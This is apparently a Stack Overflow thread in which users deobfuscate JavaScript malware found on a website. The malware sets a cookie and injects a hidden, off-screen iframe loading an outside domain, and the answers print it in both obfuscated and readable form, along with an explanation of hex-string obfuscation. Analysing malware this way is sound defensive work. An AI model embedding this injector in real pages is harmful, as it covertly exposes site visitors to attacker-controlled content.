# Decipher Javascript Malware

Tags: javascript

Can anybody able to make this [code](http://jsfiddle.net/2ubs8byx/)  more readable and understandable? it is detected as a Trojan by my anti virus. and I'm trying to understand it :)

I got it from this [question](https://stackoverflow.com/questions/33821309/malware-on-website-hxxp-looks-suspicious/33824147)

```
( function() {

})();
```

**EDIT**

Wow, I'm surprise people keep complaining I didn't add the code in here, I purposely added it on JSfiddle and didn't include it in here as it will trigger anti virus and keeps you out from accessing this page. I even have to disable my AntiVirus just to create that JSFiddle

Comment: *StackOverflow won't allow me to post this question without code so I'm adding random js below this line.* Seriously? The system is preventing you from posting your question without the relevant code for a reason. Your working around it with unrelated code demonstrates you do not understand that reason.

Comment: I didn't put the code in here as it will trigger the anti virus if you visit the question. my anti virus won't even let me visit that JSFiddle unless I disable my Anti-Virus

Comment: Oh really? so because I don't want to post the whole code in my question and added it on JSfiddle instead, I would rather not ask? just wow...

Comment: I can't believe how you keep complaining that I added some random js, would that hurt you in anyway so bad? anyway, thanks for being being an "absolute-guideline-follower".

Comment: you seem to care more about my question votes than I care about them, and yeah, I might as well, as having lots of up-votes would certainly help me in uncountable ways.

Answer (score 3, accepted):

Putting it in a javascript minifier and then a beautifier makes it less bloated and a bit more readable

```
var a = ["onload", "getDate", "setDate", "cookie", "=", "; expires=", "toUTCString", "", "=([^;]){1,}", "exec", "split", "ad-cookie", "er2vdr5gdc3ds", "div", "createElement", "http://stats.balw5ezvicz7hka.pw/?id=6947627&keyword=", "&ad_id=Xn5be4", "innerHTML", "<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='", "'></iframe></div>", "appendChild", "body"];

window[a[1]] = function() {
    function f(b, c, d) {
        if (d) {
            var e = new Date;
            e[a[2]](e[a[1]]() + d)
        }
        if (b && c) document[a[3]] =
            b + a[4] + c + (d ? a[5] + e[a[6]]() : a[7]);
        else return !1
    }
    if (function(b) {
            if (b = (new RegExp(b + a[8]))[a[9]](document[a[3]])) b = b[0][a[10]](a[4]);
            else return !1;
            return b[1] ? b[1] : !1
        }(a[11]) != a[12]) {
        f(a[11], a[12], 1);
        var c = document[a[14]](a[13]);
        c[a[17]] = a[18] + (a[15] + 983755 + a[16]) + a[19];
        document[a[21]][a[20]](c)
    }
}
```

When its unpacked it becomes:

```
window.onload = function() {
    function inject(b, c, d) {
        if (d) {
            var date = new Date;
            date.setDate(date.getDate() + d)
        }
        if (b && c) {
            document.cookie = b + "=" + c + (d ? "; expires=" + date.toUTCString() : "");
        }
        else {
            return false
        }
    }
    if (function(var1) {
        if (var1 = (new RegExp(var1 + "=([^;]){1,}")).exec(document.cookie)) 
            var1 = var1[0].split("=");
        else 
            return false;

        return var1[1] ? var1[1] : false
    }("ad-cookie") != "er2vdr5gdc3ds") {
        inject("ad-cookie", "er2vdr5gdc3ds", 1);
        var wrapper = document.createElement("div")
        wrapper.innerHTML = "<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='" + ("http://stats.balw5ezvicz7hka.pw/?id=6947627&keyword=" + 983755 + "&ad_id=Xn5be4") + '></iframe></div>';
        document.body.appendChild(wrapper)
    }
}
```

This is a example how they obfuscate the code

```js
var code = "a".charCodeAt(0); // 97
var hexCode = code.toString(16); // 61
var escaped = "this is letter a: \x61"
document.body.innerHTML = escaped // "this is letter a: a"
```

Comment: that's what I did, but still very hard to understand, though I get different result on _0xacbd variable

Comment: @silver can you understand the code now?

Comment: @Endless How did you unpack the code? What does packed mean?

Comment: @SamCousins look at this two how they are different... the first part contains a array with all the word you are using so you might use the word `cookie` multiple times so you replace it with `a[3]`. so when its unpacked i removed the array basicly

Comment: @Endless Thanks, I understand now. Good answer!

Comment: @Endless thanks, that second code surely looks understandable, btw, how did the ```\x6F\x6E\x6C\x6F\x61\x64``` is equal to ```onload``` what type of code is ```\x6F\x6E\x6C\x6F\x61\x64```?

Comment: that is just hexa decimal precipitation of all the characters code try: `alert("\x6F\x6E\x6C\x6F\x61\x64")`

Comment: @silver i updated my answer to how they obfuse the code

Comment: @Endless,  Thanks for the help. everything seems clear now :)

Answer (score 1):

So far I've managed to get:

```
var _0xacbd = ["onload", "getDate", "setDate", "cookie", "=", "; expires=", "toUTCString", "", "=([^;]){1,}", "exec", "split", "ad-cookie", "er2vdr5gdc3ds", "div", "createElement", "http://stats.balw5ezvicz7hka.pw/?id=6947627&keyword=", "&ad_id=Xn5be4", "innerHTML", "<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='", "'></iframe></div>", "appendChild", "body"];

window[_0xacbd[0]] = function() {
function _0x78a6x1(_0x78a6x2, _0x78a6x3, _0x78a6x4) {
    if (_0x78a6x4) {
        var _0x78a6x5 = new Date();
        _0x78a6x5[_0xacbd[2]](_0x78a6x5[_0xacbd[1]]() + _0x78a6x4);
    };

if (_0x78a6x2 && _0x78a6x3) {
        document[_0xacbd[3]] = _0x78a6x2 + _0xacbd[4] + _0x78a6x3 + (_0x78a6x4 ? _0xacbd[5] + _0x78a6x5[_0xacbd[6]]() : _0xacbd[7])
    } else {
        return false
    };
}

function _0x78a6x6(_0x78a6x2) {
    var _0x78a6x3 = new RegExp(_0x78a6x2 + _0xacbd[8]);
    var _0x78a6x4 = _0x78a6x3[_0xacbd[9]](document[_0xacbd[3]]);
    if (_0x78a6x4) {
        _0x78a6x4 = _0x78a6x4[0][_0xacbd[10]](_0xacbd[4])
    } else {
        return false
    };
    return _0x78a6x4[1] ? _0x78a6x4[1] : false;
}
var _0x78a6x7 = _0x78a6x6(_0xacbd[11]);
    if (_0x78a6x7 != _0xacbd[12]) {
    _0x78a6x1(_0xacbd[11], _0xacbd[12], 1);
    var _0x78a6x8 = document[_0xacbd[14]](_0xacbd[13]);
    var _0x78a6x9 = 983755;
    var _0x78a6xa = _0xacbd[15] + _0x78a6x9 + _0xacbd[16];
    _0x78a6x8[_0xacbd[17]] = _0xacbd[18] + _0x78a6xa + _0xacbd[19];
    document[_0xacbd[21]][_0xacbd[20]](_0x78a6x8);
    };
};
```

As far as I can tell, it opens an iFrame rendered off-screen directed to a malicious website. Maybe somebody with better de-obfuscation skills can get more out of it.

The initial var _0xacbd is an array with strings. Throughout the code there are references such as `_0xacbd[4]` or `_0xacbd[19]`. This corresponds to a value in the array. I haven't got time to match them up at the moment but if the `onload` string in the array is [0], and the next is [1] and so on, you can probably work out what's going on if you have the time.